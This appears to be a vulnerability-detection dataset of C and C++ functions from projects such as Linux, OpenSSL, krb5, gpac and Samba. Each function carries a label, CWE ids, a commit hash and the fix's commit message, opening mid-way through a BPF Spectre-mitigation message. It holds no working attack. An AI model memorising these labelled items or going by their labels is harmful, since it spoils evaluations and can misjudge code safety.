requires once again that every JIT needs to implement it
first. While possible, amount of changes needed would also
be unsuitable for a -stable patch. Therefore, the path which
has fewer changes, less BPF instructions for the mitigation
and does not require anything to be changed in the JITs is
option iii) which this work is pursuing. The ax register is
already mapped to a register in all JITs (modulo arm32 where
it's mapped to stack as various other BPF registers there)
and used in constant blinding for JITs-only so far. It can
be reused for verifier rewrites under certain constraints.
The interpreter's tmp "register" has therefore been remapped
into extending the register set with hidden ax register and
reusing that for a number of instructions that needed the
prior temporary variable internally (e.g. div, mod). This
allows for zero increase in stack space usage in the interpreter,
and enables (restricted) generic use in rewrites otherwise as
long as such a patchlet does not make use of these instructions.
The sanitation mask is dynamic and relative to the offset the
map value or stack pointer currently holds.
There are various cases that need to be taken under consideration
for the masking, e.g. such operation could look as follows:
ptr += val or val += ptr or ptr -= val. Thus, the value to be
sanitized could reside either in source or in destination
register, and the limit is different depending on whether
the ALU op is addition or subtraction and depending on the
current known and bounded offset. The limit is derived as
follows: limit := max_value_size - (smin_value + off). For
subtraction: limit := umax_value + off. This holds because
we do not allow any pointer arithmetic that would
temporarily go out of bounds or would have an unknown
value with mixed signed bounds where it is unclear at
verification time whether the actual runtime value would
be either negative or positive. For example, we have a
derived map pointer value with constant offset and bounded
one, so limit based on smin_value works because the verifier
requires that statically analyzed arithmetic on the pointer
must be in bounds, and thus it checks if resulting
smin_value + off and umax_value + off is still within map
value bounds at time of arithmetic in addition to time of
access. Similarly, for the case of stack access we derive
the limit as follows: MAX_BPF_STACK + off for subtraction
and -off for the case of addition where off := ptr_reg->off +
ptr_reg->var_off.value. Subtraction is a special case for
the masking which can be in form of ptr += -val, ptr -= -val,
or ptr -= val. In the first two cases where we know that
the value is negative, we need to temporarily negate the
value in order to do the sanitation on a positive value
where we later swap the ALU op, and restore original source
register if the value was in source.
The sanitation of pointer arithmetic alone is still not fully
sufficient as is, since a scenario like the following could
happen ...
PTR += 0x1000 (e.g. K-based imm)
PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
PTR += 0x1000
PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
[...]
... which under speculation could end up as ...
PTR += 0x1000
PTR -= 0 [ truncated by mitigation ]
PTR += 0x1000
PTR -= 0 [ truncated by mitigation ]
[...]
... and therefore still access out of bounds. To prevent such
case, the verifier is also analyzing safety for potential out
of bounds access under speculative execution. Meaning, it is
also simulating pointer access under truncation. We therefore
"branch off" and push the current verification state after the
ALU operation with known 0 to the verification stack for later
analysis. Given the current path analysis succeeded it is
likely that the one under speculation can be pruned. In any
case, it is also subject to existing complexity limits and
therefore anything beyond this point will be rejected. In
terms of pruning, it needs to be ensured that the verification
state from speculative execution simulation must never prune
a non-speculative execution path, therefore, we mark verifier
state accordingly at the time of push_stack(). If verifier
detects out of bounds access under speculative execution from
one of the possible paths that includes a truncation, it will
reject such program.
Given we mask every reg-based pointer arithmetic for
unprivileged programs, we've been looking into how it could
affect real-world programs in terms of size increase. As the
majority of programs are targeted for privileged-only use
case, we've unconditionally enabled masking (with its alu
restrictions on top of it) for privileged programs for the
sake of testing in order to check i) whether they get rejected
in its current form, and ii) by how much the number of
instructions and size will increase. We've tested this by
using Katran, Cilium and test_l4lb from the kernel selftests.
For Katran we've evaluated balancer_kern.o, Cilium bpf_lxc.o
and an older test object bpf_lxc_opt_-DUNKNOWN.o and l4lb
we've used test_l4lb.o as well as test_l4lb_noinline.o. We
found that none of the programs got rejected by the verifier
with this change, and that impact is rather minimal to none.
balancer_kern.o had 13,904 bytes (1,738 insns) xlated and
7,797 bytes JITed before and after the change. Most complex
program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated
and 18,538 bytes JITed before and after and none of the other
tail call programs in bpf_lxc.o had any changes either. For
the older bpf_lxc_opt_-DUNKNOWN.o object we found a small
increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed
before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed
after the change. Other programs from that object file had
similar small increase. Both test_l4lb.o had no change and
remained at 6,544 bytes (817 insns) xlated and 3,401 bytes
JITed and for test_l4lb_noinline.o constant at 5,080 bytes
(634 insns) xlated and 3,313 bytes JITed. This can be explained
in that LLVM typically optimizes stack based pointer arithmetic
by using K-based operations and that use of dynamic map access
is not overly frequent. However, in future we may decide to
optimize the algorithm further under known guarantees from
branch and value speculation. Latter seems also unclear in
terms of prediction heuristics that today's CPUs apply as well
as whether there could be collisions in e.g. the predictor's
Value History/Pattern Table for triggering out of bounds access,
thus masking is performed unconditionally at this point but could
be subject to relaxation later on. We were generally also
brainstorming various other approaches for mitigation, but the
blocker was always lack of available registers at runtime and/or
overhead for runtime tracking of limits belonging to a specific
pointer. Thus, we found this to be minimally intrusive under
given constraints.
With that in place, a simple example with sanitized access on
unprivileged load at post-verification time looks as follows:
# bpftool prog dump xlated id 282
[...]
28: (79) r1 = *(u64 *)(r7 +0)
29: (79) r2 = *(u64 *)(r7 +8)
30: (57) r1 &= 15
31: (79) r3 = *(u64 *)(r0 +4608)
32: (57) r3 &= 1
33: (47) r3 |= 1
34: (2d) if r2 > r3 goto pc+19
35: (b4) (u32) r11 = (u32) 20479 |
36: (1f) r11 -= r2 | Dynamic sanitation for pointer
37: (4f) r11 |= r2 | arithmetic with registers
38: (87) r11 = -r11 | containing bounded or known
39: (c7) r11 s>>= 63 | scalars in order to prevent
40: (5f) r11 &= r2 | out of bounds speculation.
41: (0f) r4 += r11 |
42: (71) r4 = *(u8 *)(r4 +0)
43: (6f) r4 <<= r1
[...]
For the case where the scalar sits in the destination register
as opposed to the source register, the following code is emitted
for the above example:
[...]
16: (b4) (u32) r11 = (u32) 20479
17: (1f) r11 -= r2
18: (4f) r11 |= r2
19: (87) r11 = -r11
20: (c7) r11 s>>= 63
21: (5f) r2 &= r11
22: (0f) r2 += r0
23: (61) r0 = *(u32 *)(r2 +0)
[...]
JIT blinding example with non-conflicting use of r10:
[...]
d5: je 0x0000000000000106 _
d7: mov 0x0(%rax),%edi |
da: mov $0xf153246,%r10d | Index load from map value and
e0: xor $0xf153259,%r10 | (const blinded) mask with 0x1f.
e7: and %r10,%rdi |_
ea: mov $0x2f,%r10d |
f0: sub %rdi,%r10 | Sanitized addition. Both use r10
f3: or %rdi,%r10 | but do not interfere with each
f6: neg %r10 | other. (Neither do these instructions
f9: sar $0x3f,%r10 | interfere with the use of ax as temp
fd: and %r10,%rdi | in interpreter.)
100: add %rax,%rdi |_
103: mov 0x0(%rdi),%eax
[...]
Tested that it fixes Jann's reproducer, and also checked that test_verifier
and test_progs suite with interpreter, JIT and JIT with hardening enabled
on x86-64 and arm64 runs successfully.
[0] Speculose: Analyzing the Security Implications of Speculative
Execution in CPUs, Giorgi Maisuradze and Christian Rossow,
https://arxiv.org/pdf/1801.04084.pdf
[1] A Systematic Evaluation of Transient Execution Attacks and
Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz,
Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens,
Dmitry Evtyushkin, Daniel Gruss,
https://arxiv.org/pdf/1811.05441.pdf
Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation")
Reported-by: Jann Horn <[email protected]>
Signed-off-by: Daniel Borkmann <[email protected]>
Acked-by: Alexei Starovoitov <[email protected]>
Signed-off-by: Alexei Starovoitov <[email protected]>
|
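A user-space model of the five-instruction sanitation sequence quoted above (our own translation of the emitted BPF, under the assumption that limit stays below 2^63): the result is val when 0 <= val <= limit and 0 otherwise, with no data-dependent branch for the CPU to mispredict.

#include <stdint.h>
#include <assert.h>

static uint64_t sanitize(uint64_t val, uint64_t limit)
{
    uint64_t r = limit - val;          /* top bit set iff val > limit    */
    r |= val;                          /* also catches a top-bit-set val */
    r = -r;
    r = (uint64_t)((int64_t)r >> 63);  /* all-ones if in range, else 0   */
    return val & r;
}

int main(void)
{
    assert(sanitize(5, 10)  == 5);   /* in range: passes through */
    assert(sanitize(11, 10) == 0);   /* out of range: masked to 0 */
    assert(sanitize(10, 10) == 10);  /* boundary is allowed */
    return 0;
}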
int rosecmpm(rose_address *addr1, rose_address *addr2, unsigned short mask)
{
unsigned int i, j;
if (mask > 10)
return 1;
for (i = 0; i < mask; i++) {
j = i / 2;
if ((i % 2) != 0) {
if ((addr1->rose_addr[j] & 0x0F) != (addr2->rose_addr[j] & 0x0F))
return 1;
} else {
if ((addr1->rose_addr[j] & 0xF0) != (addr2->rose_addr[j] & 0xF0))
return 1;
}
}
return 0;
}
| 0 |
[
"CWE-200"
] |
linux-2.6
|
17ac2e9c58b69a1e25460a568eae1b0dc0188c25
| 249,174,581,242,216,770,000,000,000,000,000,000,000 | 21 |
rose: Fix rose_getname() leak
rose_getname() can leak kernel memory to user.
Signed-off-by: Eric Dumazet <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
bool AOClient::checkEvidenceAccess(AreaData *area)
{
switch(area->eviMod()) {
case AreaData::EvidenceMod::FFA:
return true;
case AreaData::EvidenceMod::CM:
case AreaData::EvidenceMod::HIDDEN_CM:
return checkAuth(ACLFlags.value("CM"));
case AreaData::EvidenceMod::MOD:
return authenticated;
default:
return false;
}
}
| 0 |
[
"CWE-703",
"CWE-129"
] |
akashi
|
5566cdfedddef1f219aee33477d9c9690bf2f78b
| 312,630,285,928,534,070,000,000,000,000,000,000,000 | 14 |
Fix out of bounds crash on evidence
|
GF_Err stsd_box_read(GF_Box *s, GF_BitStream *bs)
{
ISOM_DECREASE_SIZE(s, 4)
gf_bs_read_u32(bs);
return gf_isom_box_array_read_ex(s, bs, stsd_on_child_box, GF_ISOM_BOX_TYPE_STSD);
}
| 0 |
[
"CWE-787"
] |
gpac
|
388ecce75d05e11fc8496aa4857b91245007d26e
| 149,310,596,729,448,550,000,000,000,000,000,000,000 | 7 |
fixed #1587
|
SRP_user_pwd *SRP_VBASE_get1_by_user(SRP_VBASE *vb, char *username)
{
SRP_user_pwd *user;
unsigned char digv[SHA_DIGEST_LENGTH];
unsigned char digs[SHA_DIGEST_LENGTH];
EVP_MD_CTX *ctxt = NULL;
if (vb == NULL)
return NULL;
if ((user = find_user(vb, username)) != NULL)
return srp_user_pwd_dup(user);
if ((vb->seed_key == NULL) ||
(vb->default_g == NULL) || (vb->default_N == NULL))
return NULL;
/* if the user is unknown we set parameters as well if we have a seed_key */
if ((user = SRP_user_pwd_new()) == NULL)
return NULL;
SRP_user_pwd_set_gN(user, vb->default_g, vb->default_N);
if (!SRP_user_pwd_set_ids(user, username, NULL))
goto err;
if (RAND_bytes(digv, SHA_DIGEST_LENGTH) <= 0)
goto err;
ctxt = EVP_MD_CTX_new();
EVP_DigestInit_ex(ctxt, EVP_sha1(), NULL);
EVP_DigestUpdate(ctxt, vb->seed_key, strlen(vb->seed_key));
EVP_DigestUpdate(ctxt, username, strlen(username));
EVP_DigestFinal_ex(ctxt, digs, NULL);
EVP_MD_CTX_free(ctxt);
ctxt = NULL;
if (SRP_user_pwd_set_sv_BN(user,
BN_bin2bn(digs, SHA_DIGEST_LENGTH, NULL),
BN_bin2bn(digv, SHA_DIGEST_LENGTH, NULL)))
return user;
err:
EVP_MD_CTX_free(ctxt);
SRP_user_pwd_free(user);
return NULL;
}
| 0 |
[
"CWE-399"
] |
openssl
|
380f18ed5f140e0ae1b68f3ab8f4f7c395658d9e
| 149,815,838,827,035,420,000,000,000,000,000,000,000 | 46 |
CVE-2016-0798: avoid memory leak in SRP
The SRP user database lookup method SRP_VBASE_get_by_user had confusing
memory management semantics; the returned pointer was sometimes newly
allocated, and sometimes owned by the callee. The calling code has no
way of distinguishing these two cases.
Specifically, SRP servers that configure a secret seed to hide valid
login information are vulnerable to a memory leak: an attacker
connecting with an invalid username can cause a memory leak of around
300 bytes per connection.
Servers that do not configure SRP, or configure SRP but do not configure
a seed are not vulnerable.
In Apache, the seed directive is known as SSLSRPUnknownUserSeed.
To mitigate the memory leak, the seed handling in SRP_VBASE_get_by_user
is now disabled even if the user has configured a seed.
Applications are advised to migrate to SRP_VBASE_get1_by_user. However,
note that OpenSSL makes no strong guarantees about the
indistinguishability of valid and invalid logins. In particular,
computations are currently not carried out in constant time.
Reviewed-by: Rich Salz <[email protected]>
|
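Usage under the clarified ownership contract (a sketch; vb is assumed to be an initialized SRP_VBASE): the get1 variant always returns a copy that the caller must free.

#include <openssl/srp.h>

static void lookup_and_use(SRP_VBASE *vb, char *username)
{
    SRP_user_pwd *up = SRP_VBASE_get1_by_user(vb, username);
    if (up == NULL)
        return;
    /* ... use the looked-up verifier/salt ... */
    SRP_user_pwd_free(up);   /* the "1" means the caller owns it */
}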
int regulator_enable(struct regulator *regulator)
{
struct regulator_dev *rdev = regulator->rdev;
int ret = 0;
if (regulator->always_on)
return 0;
if (rdev->supply) {
ret = regulator_enable(rdev->supply);
if (ret != 0)
return ret;
}
mutex_lock(&rdev->mutex);
ret = _regulator_enable(rdev);
mutex_unlock(&rdev->mutex);
if (ret != 0 && rdev->supply)
regulator_disable(rdev->supply);
return ret;
}
| 0 |
[
"CWE-416"
] |
linux
|
60a2362f769cf549dc466134efe71c8bf9fbaaba
| 86,565,820,226,533,060,000,000,000,000,000,000,000 | 23 |
regulator: core: Fix regulator_ena_gpio_free not to access pin after freeing
After a pin is freed in regulator_ena_gpio_free, the loop can still access
it. This patch ensures the pin is not accessed after it has been freed.
Signed-off-by: Seung-Woo Kim <[email protected]>
Signed-off-by: Mark Brown <[email protected]>
|
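The generic shape of that fix (plain C, not the regulator code): capture the successor before freeing a node, and never read through the freed element.

#include <stdlib.h>

struct node { struct node *next; };

static void free_list(struct node *head)
{
    while (head != NULL) {
        struct node *next = head->next;  /* read before the free */
        free(head);
        head = next;                     /* no access to freed memory */
    }
}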
static struct nfs4_lockdata *nfs4_alloc_lockdata(struct file_lock *fl,
struct nfs_open_context *ctx, struct nfs4_lock_state *lsp)
{
struct nfs4_lockdata *p;
struct inode *inode = lsp->ls_state->inode;
struct nfs_server *server = NFS_SERVER(inode);
p = kzalloc(sizeof(*p), GFP_KERNEL);
if (p == NULL)
return NULL;
p->arg.fh = NFS_FH(inode);
p->arg.fl = &p->fl;
p->arg.open_seqid = nfs_alloc_seqid(&lsp->ls_state->owner->so_seqid);
if (p->arg.open_seqid == NULL)
goto out_free;
p->arg.lock_seqid = nfs_alloc_seqid(&lsp->ls_seqid);
if (p->arg.lock_seqid == NULL)
goto out_free_seqid;
p->arg.lock_stateid = &lsp->ls_stateid;
p->arg.lock_owner.clientid = server->nfs_client->cl_clientid;
p->arg.lock_owner.id = lsp->ls_id.id;
p->res.lock_seqid = p->arg.lock_seqid;
p->lsp = lsp;
atomic_inc(&lsp->ls_count);
p->ctx = get_nfs_open_context(ctx);
memcpy(&p->fl, fl, sizeof(p->fl));
return p;
out_free_seqid:
nfs_free_seqid(p->arg.open_seqid);
out_free:
kfree(p);
return NULL;
}
| 0 |
[
"CWE-703"
] |
linux
|
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
| 67,316,169,948,848,040,000,000,000,000,000,000,000 | 34 |
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust <[email protected]>
|
static krb5_tl_data *dup_tl_data(krb5_tl_data *tl)
{
krb5_tl_data *n;
n = (krb5_tl_data *) malloc(sizeof(krb5_tl_data));
if (n == NULL)
return NULL;
n->tl_data_contents = malloc(tl->tl_data_length);
if (n->tl_data_contents == NULL) {
free(n);
return NULL;
}
memcpy(n->tl_data_contents, tl->tl_data_contents, tl->tl_data_length);
n->tl_data_type = tl->tl_data_type;
n->tl_data_length = tl->tl_data_length;
n->tl_data_next = NULL;
return n;
}
| 0 |
[
"CWE-703"
] |
krb5
|
c5be6209311d4a8f10fda37d0d3f876c1b33b77b
| 282,873,506,446,365,240,000,000,000,000,000,000,000 | 18 |
Null pointer deref in kadmind [CVE-2012-1013]
The fix for #6626 could cause kadmind to dereference a null pointer if
a create-principal request contains no password but does contain the
KRB5_KDB_DISALLOW_ALL_TIX flag (e.g. "addprinc -randkey -allow_tix
name"). Only clients authorized to create principals can trigger the
bug. Fix the bug by testing for a null password in check_1_6_dummy.
CVSSv2 vector: AV:N/AC:M/Au:S/C:N/I:N/A:P/E:H/RL:O/RC:C
[[email protected]: Minor style change and commit message]
ticket: 7152
target_version: 1.10.2
tags: pullup
|
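The fix reduced to its essentials (illustrative, not the kadmind source): bail out of the 1.6 dummy-password workaround when the request carries no password at all.

#include <stddef.h>

static void check_1_6_dummy_sketch(const char *password, long attributes)
{
    if (password == NULL)   /* randkey + -allow_tix requests land here */
        return;             /* nothing to inspect; avoids the null deref */
    /* ... original dummy-password detection on `password` ... */
    (void)attributes;
}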
rsock_init_unixsocket(void)
{
#ifdef HAVE_SYS_UN_H
/*
* Document-class: UNIXSocket < BasicSocket
*
* UNIXSocket represents a UNIX domain stream client socket.
*/
rb_cUNIXSocket = rb_define_class("UNIXSocket", rb_cBasicSocket);
rb_define_method(rb_cUNIXSocket, "initialize", unix_init, 1);
rb_define_method(rb_cUNIXSocket, "path", unix_path, 0);
rb_define_method(rb_cUNIXSocket, "addr", unix_addr, 0);
rb_define_method(rb_cUNIXSocket, "peeraddr", unix_peeraddr, 0);
rb_define_method(rb_cUNIXSocket, "recvfrom", unix_recvfrom, -1);
rb_define_method(rb_cUNIXSocket, "send_io", unix_send_io, 1);
rb_define_method(rb_cUNIXSocket, "recv_io", unix_recv_io, -1);
rb_define_singleton_method(rb_cUNIXSocket, "socketpair", unix_s_socketpair, -1);
rb_define_singleton_method(rb_cUNIXSocket, "pair", unix_s_socketpair, -1);
#endif
}
| 0 |
[
"CWE-20"
] |
ruby
|
8794dec6a5f11adc5cdd19a5ee91ea6b0816763f
| 334,363,784,335,377,800,000,000,000,000,000,000,000 | 20 |
unixsocket.c: check NUL bytes
* ext/socket/unixsocket.c (rsock_init_unixsock): check NUL bytes.
https://hackerone.com/reports/302997
git-svn-id: svn+ssh://ci.ruby-lang.org/ruby/trunk@62991 b2dd03c8-39d4-4d8f-98ff-823fe69b080e
|
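The generic form of such a check (a sketch, not the Ruby source): a path that embeds a NUL byte has a logical length longer than what C string APIs will see, so compare against the known length.

#include <string.h>

static int path_has_nul(const char *buf, size_t len)
{
    /* Any embedded '\0' before len means the path would be silently
     * truncated by NUL-terminated syscalls; reject it. */
    return memchr(buf, '\0', len) != NULL;
}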
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_siz_t *siz = &ms->parms.siz;
int compno;
int tileno;
jpc_dec_tile_t *tile;
jpc_dec_tcomp_t *tcomp;
int htileno;
int vtileno;
jpc_dec_cmpt_t *cmpt;
size_t size;
dec->xstart = siz->xoff;
dec->ystart = siz->yoff;
dec->xend = siz->width;
dec->yend = siz->height;
dec->tilewidth = siz->tilewidth;
dec->tileheight = siz->tileheight;
dec->tilexoff = siz->tilexoff;
dec->tileyoff = siz->tileyoff;
dec->numcomps = siz->numcomps;
if (!(dec->cp = jpc_dec_cp_create(dec->numcomps))) {
return -1;
}
if (!(dec->cmpts = jas_alloc2(dec->numcomps, sizeof(jpc_dec_cmpt_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts; compno < dec->numcomps; ++compno,
++cmpt) {
cmpt->prec = siz->comps[compno].prec;
cmpt->sgnd = siz->comps[compno].sgnd;
cmpt->hstep = siz->comps[compno].hsamp;
cmpt->vstep = siz->comps[compno].vsamp;
cmpt->width = JPC_CEILDIV(dec->xend, cmpt->hstep) -
JPC_CEILDIV(dec->xstart, cmpt->hstep);
cmpt->height = JPC_CEILDIV(dec->yend, cmpt->vstep) -
JPC_CEILDIV(dec->ystart, cmpt->vstep);
cmpt->hsubstep = 0;
cmpt->vsubstep = 0;
}
dec->image = 0;
dec->numhtiles = JPC_CEILDIV(dec->xend - dec->tilexoff, dec->tilewidth);
dec->numvtiles = JPC_CEILDIV(dec->yend - dec->tileyoff, dec->tileheight);
if (!jas_safe_size_mul(dec->numhtiles, dec->numvtiles, &size)) {
return -1;
}
dec->numtiles = size;
JAS_DBGLOG(10, ("numtiles = %d; numhtiles = %d; numvtiles = %d;\n",
dec->numtiles, dec->numhtiles, dec->numvtiles));
if (!(dec->tiles = jas_alloc2(dec->numtiles, sizeof(jpc_dec_tile_t)))) {
return -1;
}
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
htileno = tileno % dec->numhtiles;
vtileno = tileno / dec->numhtiles;
tile->realmode = 0;
tile->state = JPC_TILE_INIT;
tile->xstart = JAS_MAX(dec->tilexoff + htileno * dec->tilewidth,
dec->xstart);
tile->ystart = JAS_MAX(dec->tileyoff + vtileno * dec->tileheight,
dec->ystart);
tile->xend = JAS_MIN(dec->tilexoff + (htileno + 1) *
dec->tilewidth, dec->xend);
tile->yend = JAS_MIN(dec->tileyoff + (vtileno + 1) *
dec->tileheight, dec->yend);
tile->numparts = 0;
tile->partno = 0;
tile->pkthdrstream = 0;
tile->pkthdrstreampos = 0;
tile->pptstab = 0;
tile->cp = 0;
tile->pi = 0;
if (!(tile->tcomps = jas_alloc2(dec->numcomps,
sizeof(jpc_dec_tcomp_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts, tcomp = tile->tcomps;
compno < dec->numcomps; ++compno, ++cmpt, ++tcomp) {
tcomp->rlvls = 0;
tcomp->numrlvls = 0;
tcomp->data = 0;
tcomp->xstart = JPC_CEILDIV(tile->xstart, cmpt->hstep);
tcomp->ystart = JPC_CEILDIV(tile->ystart, cmpt->vstep);
tcomp->xend = JPC_CEILDIV(tile->xend, cmpt->hstep);
tcomp->yend = JPC_CEILDIV(tile->yend, cmpt->vstep);
tcomp->tsfb = 0;
}
}
dec->pkthdrstreams = 0;
/* We should expect to encounter other main header marker segments
or an SOT marker segment next. */
dec->state = JPC_MH;
return 0;
}
| 0 |
[
"CWE-20",
"CWE-399"
] |
jasper
|
ba2b9d000660313af7b692542afbd374c5685865
| 67,536,564,840,354,760,000,000,000,000,000,000,000 | 104 |
Ensure that not all tiles lie outside the image area.
|
static void
yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule, void *yyscanner, HEX_LEX_ENVIRONMENT *lex_env)
{
unsigned long int yylno = yyrline[yyrule];
int yynrhs = yyr2[yyrule];
int yyi;
YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n",
yyrule - 1, yylno);
/* The symbols being reduced. */
for (yyi = 0; yyi < yynrhs; yyi++)
{
YYFPRINTF (stderr, " $%d = ", yyi + 1);
yy_symbol_print (stderr,
yystos[yyssp[yyi + 1 - yynrhs]],
&(yyvsp[(yyi + 1) - (yynrhs)])
, yyscanner, lex_env);
YYFPRINTF (stderr, "\n");
| 0 |
[
"CWE-674",
"CWE-787"
] |
yara
|
10e8bd3071677dd1fa76beeef4bc2fc427cea5e7
| 6,727,116,766,566,016,000,000,000,000,000,000,000 | 18 |
Fix issue #674 for hex strings.
|
static GF_Err gf_isom_check_mvc(GF_ISOFile *the_file, GF_TrackBox *trak, GF_MPEGVisualSampleEntryBox *entry)
{
u32 i;
GF_Box *mvci;
GF_MultiviewGroupBox *mvcg;
GF_ViewIdentifierBox *vwid;
if (entry->mvc_config) {}
else if (entry->avc_config && entry->avc_config->config && entry->avc_config->config->sequenceParameterSetExtensions) {}
else
return GF_OK;
mvci = gf_isom_box_find_child(trak->Media->information->child_boxes, GF_ISOM_BOX_TYPE_MVCI);
if (!mvci) {
mvci = gf_isom_box_new_parent(&trak->Media->information->child_boxes, GF_ISOM_BOX_TYPE_MVCI);
if (!mvci) return GF_OUT_OF_MEM;
}
mvcg = (GF_MultiviewGroupBox *) gf_isom_box_find_child(mvci->child_boxes, GF_ISOM_BOX_TYPE_MVCG);
if (!mvcg) {
mvcg = (GF_MultiviewGroupBox *)gf_isom_box_new_parent(&mvci->child_boxes, GF_ISOM_BOX_TYPE_MVCG);
if (!mvcg) return GF_OUT_OF_MEM;
}
//this is very crude, we should try to parse the bitstream to fill these
mvcg->num_entries = 0;
if (mvcg->entries) {
gf_free(mvcg->entries);
mvcg->entries = NULL;
}
if (entry->avc_config) {
if (gf_list_count(entry->avc_config->config->sequenceParameterSets))
mvcg->num_entries += 1;
mvcg->num_entries += gf_list_count(entry->avc_config->config->sequenceParameterSetExtensions);
}
if (entry->mvc_config && entry->mvc_config->config) {
mvcg->num_entries += gf_list_count(entry->mvc_config->config->sequenceParameterSets);
}
mvcg->entries = gf_malloc(sizeof(MVCIEntry)*mvcg->num_entries);
if (!mvcg->entries) return GF_OUT_OF_MEM;
memset(mvcg->entries, 0, sizeof(MVCIEntry)*mvcg->num_entries);
for (i=0; i<mvcg->num_entries; i++) {
mvcg->entries[i].entry_type = 2;
mvcg->entries[i].output_view_id = i;
}
vwid = (GF_ViewIdentifierBox *) gf_isom_box_find_child(entry->child_boxes, GF_ISOM_BOX_TYPE_VWID);
if (!vwid) {
vwid = (GF_ViewIdentifierBox *)gf_isom_box_new_parent(&entry->child_boxes, GF_ISOM_BOX_TYPE_VWID);
		if (!vwid) return GF_OUT_OF_MEM;
}
if (vwid->views) gf_free(vwid->views);
vwid->num_views = mvcg->num_entries;
vwid->views = gf_malloc(sizeof(ViewIDEntry)*vwid->num_views);
if (!vwid->views) return GF_OUT_OF_MEM;
memset(vwid->views, 0, sizeof(ViewIDEntry)*vwid->num_views);
for (i=0; i<vwid->num_views; i++) {
vwid->views[i].base_view_type = i ? 0 : 1;
vwid->views[i].view_id = i;
vwid->views[i].view_order_index = i;
}
return GF_OK;
}
| 0 |
[
"CWE-401"
] |
gpac
|
0a85029d694f992f3631e2f249e4999daee15cbf
| 55,282,365,399,051,010,000,000,000,000,000,000,000 | 62 |
fixed #1785 (fuzz)
|
TEST(RoleGraphTest, AddRoleFromDocumentWithRestricitonMerge) {
const BSONArray roleARestrictions = BSON_ARRAY(BSON("clientSource" << BSON_ARRAY("::1/128")));
const BSONArray roleBRestrictions =
BSON_ARRAY(BSON("serverAddress" << BSON_ARRAY("127.0.0.1/8")));
RoleGraph graph;
ASSERT_OK(graph.addRoleFromDocument(BSON("_id"
<< "dbA.roleA"
<< "role"
<< "roleA"
<< "db"
<< "dbA"
<< "privileges"
<< BSONArray()
<< "roles"
<< BSONArray()
<< "authenticationRestrictions"
<< roleARestrictions)));
ASSERT_OK(graph.addRoleFromDocument(BSON("_id"
<< "dbB.roleB"
<< "role"
<< "roleB"
<< "db"
<< "dbB"
<< "privileges"
<< BSONArray()
<< "roles"
<< BSON_ARRAY(BSON("role"
<< "roleA"
<< "db"
<< "dbA"))
<< "authenticationRestrictions"
<< roleBRestrictions)));
ASSERT_OK(graph.recomputePrivilegeData());
const auto A = graph.getDirectAuthenticationRestrictions(RoleName("roleA", "dbA"));
const auto B = graph.getDirectAuthenticationRestrictions(RoleName("roleB", "dbB"));
const auto gaar = graph.getAllAuthenticationRestrictions(RoleName("roleB", "dbB"));
ASSERT_TRUE(std::any_of(gaar.begin(), gaar.end(), [A](const auto& r) { return A == r; }));
ASSERT_TRUE(std::any_of(gaar.begin(), gaar.end(), [B](const auto& r) { return B == r; }));
}
| 0 |
[
"CWE-863"
] |
mongo
|
fb87cc88ecb5d300f14cda7bc238d7d5132118f5
| 10,862,676,005,022,104,000,000,000,000,000,000,000 | 41 |
SERVER-45472 Ensure RoleGraph can serialize authentication restrictions to BSON
(cherry picked from commit 521e56b407ac72bc69a97a24d1253f51a5b6e81b)
(cherry picked from commit a10d0a22d5d009d27664967181042933ec1bef36)
|
static Value make(const T &value) {
#ifdef __clang__
Value result = MakeValue<Formatter>(value);
// Workaround a bug in Apple LLVM version 4.2 (clang-425.0.28) of clang:
// https://github.com/fmtlib/fmt/issues/276
(void)result.custom.format;
return result;
#else
return MakeValue<Formatter>(value);
#endif
}
| 0 |
[
"CWE-134",
"CWE-119",
"CWE-787"
] |
fmt
|
8cf30aa2be256eba07bb1cefb998c52326e846e7
| 93,471,850,034,553,520,000,000,000,000,000,000,000 | 11 |
Fix segfault on complex pointer formatting (#642)
|
static int vfswrap_close(vfs_handle_struct *handle, files_struct *fsp)
{
int result;
START_PROFILE(syscall_close);
result = fd_close_posix(fsp);
END_PROFILE(syscall_close);
return result;
}
| 0 |
[
"CWE-665"
] |
samba
|
30e724cbff1ecd90e5a676831902d1e41ec1b347
| 160,131,800,265,065,110,000,000,000,000,000,000,000 | 9 |
FSCTL_GET_SHADOW_COPY_DATA: Initialize output array to zero
Otherwise num_volumes and the end marker can return uninitialized data
to the client.
Signed-off-by: Christof Schmitt <[email protected]>
Reviewed-by: Jeremy Allison <[email protected]>
Reviewed-by: Simo Sorce <[email protected]>
|
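The pattern of the fix, in miniature (generic C): zero the reply buffer up front so any field the handler never explicitly writes reads back as zero rather than as stale heap or stack contents.

#include <string.h>

static void build_reply(char *reply, size_t reply_len)
{
    memset(reply, 0, reply_len);  /* unwritten fields now read as 0 */
    /* ... fill in only the fields this code path produces ... */
}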
mysql_getopt_value(const char *keyname, uint key_length,
const struct my_option *option, int *error)
{
if (error)
*error= 0;
switch (option->id) {
case OPT_KEY_BUFFER_SIZE:
case OPT_KEY_CACHE_BLOCK_SIZE:
case OPT_KEY_CACHE_DIVISION_LIMIT:
case OPT_KEY_CACHE_AGE_THRESHOLD:
case OPT_KEY_CACHE_PARTITIONS:
{
KEY_CACHE *key_cache;
if (!(key_cache= get_or_create_key_cache(keyname, key_length)))
{
if (error)
*error= EXIT_OUT_OF_MEMORY;
return 0;
}
switch (option->id) {
case OPT_KEY_BUFFER_SIZE:
return &key_cache->param_buff_size;
case OPT_KEY_CACHE_BLOCK_SIZE:
return &key_cache->param_block_size;
case OPT_KEY_CACHE_DIVISION_LIMIT:
return &key_cache->param_division_limit;
case OPT_KEY_CACHE_AGE_THRESHOLD:
return &key_cache->param_age_threshold;
